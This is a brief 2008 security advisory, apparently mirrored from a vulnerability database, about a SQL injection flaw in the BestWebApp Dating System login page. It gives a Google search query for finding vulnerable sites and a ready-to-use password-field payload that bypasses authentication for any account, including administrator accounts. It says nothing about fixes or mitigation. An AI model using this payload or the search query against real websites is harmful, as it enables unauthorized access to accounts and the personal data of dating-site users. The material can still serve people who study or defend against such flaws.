Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19251
HistoryFeb 24, 2008 - 12:00 a.m.

[Aria-Security.Net] BestWebApp Dating System SQL Injection

2008-02-2400:00:00
vulners.com
17

Aria-Security Team (Persian Security Network)
http://Aria-Security.net

Shutouts: AurA, imm02tal
Original Advisory and more info about this vulnerability: http://forum.aria-security.net/showthread.php?p=1442
Vendor: http://www.bestwebapp.com
Google Search: inurl:login_form.asp DATING Website

Login_form.asp
Chose Any username you want, doesnt matter, it can be admin, or just a normal user. YOU CHOSE!
Password: anything' OR 'x'='x

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net